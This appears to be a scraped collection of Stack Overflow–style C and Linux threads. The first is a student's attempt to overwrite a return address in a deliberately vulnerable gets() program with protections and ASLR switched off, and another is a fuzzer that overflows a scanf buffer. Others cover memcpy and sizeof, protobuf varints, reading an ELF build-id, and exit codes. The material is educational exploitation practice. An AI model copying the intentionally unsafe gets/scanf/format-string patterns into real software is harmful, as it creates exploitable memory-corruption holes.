Writing a buffer overflow exploit - security

I understand there are quite a few tutorials on how to write a buffer overflow, but still can't write my own.
The following is the C code I want to hack:
#include <stdio.h>
#include <stdlib.h>
static int x = 8;
void prompt(){
char buf[100];
gets(buf);
printf("You entered: %s\n", buf);
}
int main(){
prompt();
return 0;
}
void target(){
printf("Haha! I made it!\n");
exit(0);
}
My goal is to execute the target () function via a buffer overflow exploit.
Through trial and error, I've discovered the minimum number of characters required to obtain a segmentation fault is 108. (Therefore 107 characters does NOT cause seg fault)
I've disassembled the binary, and found the target executable to be at address 0x08048e7f
I've flipped the byte order to compensate for endian-ness. --> 0x7f8e0408
I then converted that hexadecimal to a binary, then to ASCII, obtaining: & # 3 8 1 ; (ignore spaces, stackoverflow doesn't properly show it originally)
Afterwards, I inserted the first 107 characters, and then Ž
Thus, my attack string is: iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiŽ
This still gives me a segmentation fault.
I've compiled like so:
gcc ./vuln_program.c -fno-stack-protector -z execstack -static -o vuln_program
and have disabled protections beforehand like so:
sudo sysctl -w kernel.randomize_va_space=0
I am using a 32 bit Ubuntu virtual machine.
Any ideas?
Thank you.
EDIT:
I just realized that my output on this site is being read as weird characters.
If you see a weird Z, it really is 1) & 2) # 3) 3 4)8 5) 1 6) ; in that exact order

Related

How to use memcpy in function that is passed a char pointer?

I'm quite new to pointers in c.
Here is a snippet of code I'm working on. I am probably not passing the pointer correctly but I can't figure out what's wrong.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
__uint16_t CCrc8();
__uint16_t process_command();
int main () {
//command format: $SET,<0-1023>*<checksum,hex>\r\n
char test_payload[] = "SET,1023*6e";
process_command(test_payload);
return 0;
}
__uint16_t process_command(char *str1) {
char local_str[20];
memcpy(local_str, str1, sizeof(str1));
printf(str1);
printf("\n");
printf(local_str);
}
This results in:
SET,1023*6e
SET,1023
I'm expecting both lines to be the same. Anything past 8 characters is left off.
The only thing I can determine is that the problem is something with sizeof(str1). Any help appreciated.
Update: I've learned sizeof(*char) is 2 on 16bit systems, 4 on 32bit systems and 8 on 64-bit systems.
So how can I use memcpy to get a local copy of str1 when I'm unsure of the size it will be?
sizeof is a compiler keyword. What you need is strlen from #include <string.h>.
The value of sizeof is determinated at compile time. For example sizeof(char[10]) just means 10. strlen on the other hand is a libc function that can determine string length dynamically.
sizeof on a pointer tells you the size of the pointer itself, not of what it points to. Since you're on a 64-bit system, pointers are 8 bytes long, so your memcpy is always copying 8 bytes. Since your string is null terminated, you should use stpncpy instead, like this:
if(stpncpy(local_str, str1, 20) == local_str + 20) {
// too long - handle it somehow
}
That will copy the string until it gets to a NUL terminator or runs out of space in the destination, and in the latter case you can handle it.

Python3 fuzzer get return code name

I've written a fuzzer to cause a buffer overflow on a vulnerable C application by creating a subprocess of it.
CASE #2 (Size = 24):
IN: AjsdfFjSueFmVnJiSkOpOjHk
OUT: -11
IN symbolizes the value passed to scanf
OUT symbolizes the return value
the vulnerable program:
#include <stdio.h>
#include <stdlib.h>
#define N 16 /* buffer size */
int main(void) {
char name[N]; /* buffer */
/* prompt user for name */
printf("What's your name? ");
scanf("%s", name);
printf("Hi there, %s!\n", name); /* greet the user */
return EXIT_SUCCESS;
}
running this vulnerable program manually with my above generated payload it returns:
Segmentation Fault
Now to properly print the error cause I'd like to map the int return value to an enumeration -> like Segmentation Fault = -11
However, during my research I could not find any information on how these error codes are actually mapped, even for my example -11 = Segmentation fault
I found the solution:
Popen.returncode
The child return code, set by poll() and wait() (and indirectly by communicate()). A None value indicates that the process hasn’t
terminated yet.
A negative value -N indicates that the child was terminated by signal N (Unix only).
-> Unix Signals
Hope this helps someone else too.

linux rpc: Varint for protobuf encoding : not expected value

I'm using google protocol buffer library with:
$protoc --version
libprotoc 2.5.0
I search internet and it says the value encoding of a integer consists of multibytes that each byte 1st bit, is the indicator to say whether the encoding should continue to another byte. My understanding:
For a number 101 (0x65), it has only 1 byte, so its encoded value is still 0x65
For a number 0x6565, as long as it has 2 bytes, and intel uses little endian, the 1st byte should modify its first bit to be 1, and thus 0x65+0x80=0xe5, so the whole integer will have 2 bytes, and should become
0x65e5
This is my expectation. but I tested with my sample program. First I tried to set a "0x65" value to log7.data, and set "0x6565" to log8.data, and use xxl command to check them
cat 7.proto
message hello
{
required int32 f1=1;
}
$cat 7.cpp
#include "7.pb.h"
#include<fstream>
using namespace std;
int main()
{
fstream f("./log7.data",ios::binary|ios::out);
hello p;
p.set_f1(0x65);
p.SerializeToOstream(&f);
return 0;
}
$cat 8.cpp
#include ".pb.h"
#include<fstream>
using namespace std;
int main()
{
fstream f("./log8.data",ios::binary|ios::out);
hello p;
p.set_f1(0x6565);
p.SerializeToOstream(&f);
return 0;
}
Check the output:
$protoc 7.proto --cpp_out=./
g++ 7.cpp 7.pb.cc -lprotobuf && ./a.out && xxd log7.data
00000000: 0865 .e
$protoc 8.proto --cpp_out=./
$g++ 8.cpp 8.pb.cc -lprotobuf && ./a.out && xxd log8.data
00000000: 08e5 ca01 ....
You can see, for log8.data, I expect it to be "08e5 65", but it's actually "08e5 ca01". How to explain this value?
Thanks.
you need to split by 7 bit and add first bit
0x6565 => to binary
0b110010101100101 => split by 7 bit
0b1 1001010 1100101 => add first bit except first
0b1 11001010 11100101 => now show in hex
0x01cae5

can a program read its own elf section?

I would like to use ld's --build-id option in order to add build information to my binary. However, I'm not sure how to make this information available inside the program. Assume I want to write a program that writes a backtrace every time an exception occurs, and a script that parses this information. The script reads the symbol table of the program and searches for the addresses printed in the backtrace (I'm forced to use such a script because the program is statically linked and backtrace_symbols is not working). In order for the script to work correctly I need to match build version of the program with the build version of the program which created the backtrace. How can I print the build version of the program (located in the .note.gnu.build-id elf section) from the program itself?
How can I print the build version of the program (located in the .note.gnu.build-id elf section) from the program itself?
You need to read the ElfW(Ehdr) (at the beginning of the file) to find program headers in your binary (.e_phoff and .e_phnum will tell you where program headers are, and how many of them to read).
You then read program headers, until you find PT_NOTE segment of your program. That segment will tell you offset to the beginning of all the notes in your binary.
You then need to read the ElfW(Nhdr) and skip the rest of the note (total size of the note is sizeof(Nhdr) + .n_namesz + .n_descsz, properly aligned), until you find a note with .n_type == NT_GNU_BUILD_ID.
Once you find NT_GNU_BUILD_ID note, skip past its .n_namesz, and read the .n_descsz bytes to read the actual build-id.
You can verify that you are reading the right data by comparing what you read with the output of readelf -n a.out.
P.S.
If you are going to go through the trouble to decode build-id as above, and if your executable is not stripped, it may be better for you to just decode and print symbol names instead (i.e. to replicate what backtrace_symbols does) -- it's actually easier to do than decoding ELF notes, because the symbol table contains fixed-sized entries.
Basically, this is the code I've written based on answer given to my question. In order to compile the code I had to make some changes and I hope it will work for as many types of platforms as possible. However, it was tested only on one build machine. One of the assumptions I used was that the program was built on the machine which runs it so no point in checking endianness compatibility between the program and the machine.
user#:~/$ uname -s -r -m -o
Linux 3.2.0-45-generic x86_64 GNU/Linux
user#:~/$ g++ test.cpp -o test
user#:~/$ readelf -n test | grep Build
Build ID: dc5c4682e0282e2bd8bc2d3b61cfe35826aa34fc
user#:~/$ ./test
Build ID: dc5c4682e0282e2bd8bc2d3b61cfe35826aa34fc
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#if __x86_64__
# define ElfW(type) Elf64_##type
#else
# define ElfW(type) Elf32_##type
#endif
/*
detecting build id of a program from its note section
http://stackoverflow.com/questions/17637745/can-a-program-read-its-own-elf-section
http://www.scs.stanford.edu/histar/src/pkg/uclibc/utils/readelf.c
http://www.sco.com/developers/gabi/2000-07-17/ch5.pheader.html#note_section
*/
int main (int argc, char* argv[])
{
char *thefilename = argv[0];
FILE *thefile;
struct stat statbuf;
ElfW(Ehdr) *ehdr = 0;
ElfW(Phdr) *phdr = 0;
ElfW(Nhdr) *nhdr = 0;
if (!(thefile = fopen(thefilename, "r"))) {
perror(thefilename);
exit(EXIT_FAILURE);
}
if (fstat(fileno(thefile), &statbuf) < 0) {
perror(thefilename);
exit(EXIT_FAILURE);
}
ehdr = (ElfW(Ehdr) *)mmap(0, statbuf.st_size,
PROT_READ|PROT_WRITE, MAP_PRIVATE, fileno(thefile), 0);
phdr = (ElfW(Phdr) *)(ehdr->e_phoff + (size_t)ehdr);
while (phdr->p_type != PT_NOTE)
{
++phdr;
}
nhdr = (ElfW(Nhdr) *)(phdr->p_offset + (size_t)ehdr);
while (nhdr->n_type != NT_GNU_BUILD_ID)
{
nhdr = (ElfW(Nhdr) *)((size_t)nhdr + sizeof(ElfW(Nhdr)) + nhdr->n_namesz + nhdr->n_descsz);
}
unsigned char * build_id = (unsigned char *)malloc(nhdr->n_descsz);
memcpy(build_id, (void *)((size_t)nhdr + sizeof(ElfW(Nhdr)) + nhdr->n_namesz), nhdr->n_descsz);
printf(" Build ID: ");
for (int i = 0 ; i < nhdr->n_descsz ; ++i)
{
printf("%02x",build_id[i]);
}
free(build_id);
printf("\n");
return 0;
}
Yes, a program can read its own .note.gnu.build-id. The important piece is the dl_iterate_phdr function.
I've used this technique in Mesa (the OpenGL/Vulkan implementation) to read its own build-id for use with the on-disk shader cache.
I've extracted those bits into a separate project[1] for easy use by others.
[1] https://github.com/mattst88/build-id

What is a good Linux exit error code strategy?

I have several independent executable Perl, PHP CLI scripts and C++ programs for which I need to develop an exit error code strategy. These programs are called by other programs using a wrapper class I created to use exec() in PHP. So, I will be able to get an error code back. Based on that error code, the calling script will need to do something.
I have done a little bit of research and it seems like anything in the 1-254 (or maybe just 1-127) range could be fair game to user-defined error codes.
I was just wondering how other people have approached error handling in this situation.
The only convention is that you return 0 for success, and something other than zero for an error. Most well-known unix programs document the various return codes that they can return, and so should you. It doesn't make a lot of sense to try to make a common list for all possible error codes that any arbitrary program could return, or else you end up with tens of thousands of them like some other OS's, and even then, it doesn't always cover the specific type of error you want to return.
So just be consistent, and be sure to document whatever scheme you decide to use.
1-127 is the available range. Anything over 127 is supposed to be "abnormal" exit - terminated by a signal.
While you're at it, consider using stdout rather than exit code. Exit code is by tradition used to indicate success, failure, and may be one other state. Rather than using exit code, try using stdout the way expr and wc use it. You can then use backtick or something similar in the caller to extract the result.
the unix manifesto states -
Exit as soon and as loud as possible on error
or something like that
Don't try to encode too much meaning into the exit value: detailed statuses and error reports should go to stdout / stderr as Arkadiy suggests.
However, I have found it very useful to represent just a handful of states in the exit values, using binary digits to encode them. For example, suppose you have the following contrived meanings:
0000 : 0 (no error)
0001 : 1 (error)
0010 : 2 (I/O error)
0100 : 4 (user input error)
1000 : 8 (permission error)
Then, a user input error would have a return value of 5 (4 + 1), while a log file not having write permission might have a return value of 11 (8 + 2 + 1). As the different meanings are independently encoded in the return value, you can easily see what's happened by checking which bits are set.
As a special case, to see if there was an error you can AND the return code with 1.
By doing this, you can encode a couple of different things in the return code, in a clear and simple way. I use this only to make simple decisions such as "should the process be restarted", "do the return value and relevant logs need to be sent to an admin", that sort of thing. Any detailed diagnostic information should go to logs or to stdout / stderr.
The normal exit statuses run from 0 to 255 (see Exit codes bigger than 255 posssible for a discussion of why). Normally, status 0 indicates success; anything else is an implementation-defined error. I do know of a program that reports the state of a DBMS server via the exit status; that is a special case of implementation-defined exit statuses. Note that you get to define the implementation of the statuses of your programs.
I couldn't fit this into 300 characters; otherwise it would have been a comment to #Arkadiy's answer.
Arkadiy is right that in one part of the exit status word, values other than zero indicate the signal that terminated the process and the 8th bit normally indicates a core dump, but that section of the exit status is different from the main 0..255 status. However, the shell (whichever shell it is) is presented with a problem when a process dies as a result of a signal. There is 16 bits of data to be presented in an 8-bit value, which is always tricky. What the shells seem to do is to take the signal number and add 128 to it. So, if a process dies as a result of an interrupt (signal number 2, SIGINT), the shell reports the exit status as 130. However, the kernel reported the status as 0x0002; the shell has modified what the kernel reports.
The following C code demonstrates this. There are two programs
suicide which kills itself using a signal of your choosing (interrupt by default).
exitstatus which runs a command (such as suicide) and reports the kernel exit status.
Here's suicide.c:
/*
#(#)File: $RCSfile: suicide.c,v $
#(#)Version: $Revision: 1.2 $
#(#)Last changed: $Date: 2008/12/28 03:45:18 $
#(#)Purpose: Commit suicide using kill()
#(#)Author: J Leffler
#(#)Copyright: (C) JLSS 2008
#(#)Product: :PRODUCT:
*/
/*TABSTOP=4*/
#if __STDC_VERSION__ >= 199901L
#define _XOPEN_SOURCE 600
#else
#define _XOPEN_SOURCE 500
#endif /* __STDC_VERSION__ */
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include "stderr.h"
static const char usestr[] = "[-V][-s signal]";
#ifndef lint
/* Prevent over-aggressive optimizers from eliminating ID string */
extern const char jlss_id_suicide_c[];
const char jlss_id_suicide_c[] = "#(#)$Id: suicide.c,v 1.2 2008/12/28 03:45:18 jleffler Exp $";
#endif /* lint */
int main(int argc, char **argv)
{
int signum = SIGINT;
int opt;
char *end;
err_setarg0(argv[0]);
while ((opt = getopt(argc, argv, "Vs:")) != -1)
{
switch (opt)
{
case 's':
signum = strtol(optarg, &end, 0);
if (*end != '\0' || signum <= 0)
err_error("invalid signal number %s\n", optarg);
break;
case 'V':
err_version("SUICIDE", &"#(#)$Revision: 1.2 $ ($Date: 2008/12/28 03:45:18 $)"[4]);
break;
default:
err_usage(usestr);
break;
}
}
if (optind != argc)
err_usage(usestr);
kill(getpid(), signum);
return(0);
}
And here's exitstatus.c:
/*
#(#)File: $RCSfile: exitstatus.c,v $
#(#)Version: $Revision: 1.2 $
#(#)Last changed: $Date: 2008/12/28 03:45:18 $
#(#)Purpose: Run command and report 16-bit exit status
#(#)Author: J Leffler
#(#)Copyright: (C) JLSS 2008
#(#)Product: :PRODUCT:
*/
/*TABSTOP=4*/
#if __STDC_VERSION__ >= 199901L
#define _XOPEN_SOURCE 600
#else
#define _XOPEN_SOURCE 500
#endif /* __STDC_VERSION__ */
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#include "stderr.h"
#ifndef lint
/* Prevent over-aggressive optimizers from eliminating ID string */
extern const char jlss_id_exitstatus_c[];
const char jlss_id_exitstatus_c[] = "#(#)$Id: exitstatus.c,v 1.2 2008/12/28 03:45:18 jleffler Exp $";
#endif /* lint */
int main(int argc, char **argv)
{
pid_t pid;
err_setarg0(argv[0]);
if (argc < 2)
err_usage("cmd [args...]");
if ((pid = fork()) < 0)
err_syserr("fork() failed: ");
else if (pid == 0)
{
/* Child */
execvp(argv[1], &argv[1]);
return(1);
}
else
{
pid_t corpse;
int status;
corpse = waitpid(pid, &status, 0);
if (corpse != pid)
err_syserr("waitpid() failed: ");
printf("0x%04X\n", status);
}
return(0);
}
The missing code, stderr.c and stderr.h, can easily be found in essentially any of my published programs. If you need it urgently, get it from the program SQLCMD at the IIUG Software Archive; alternatively, contact me by email (see my profile).

Resources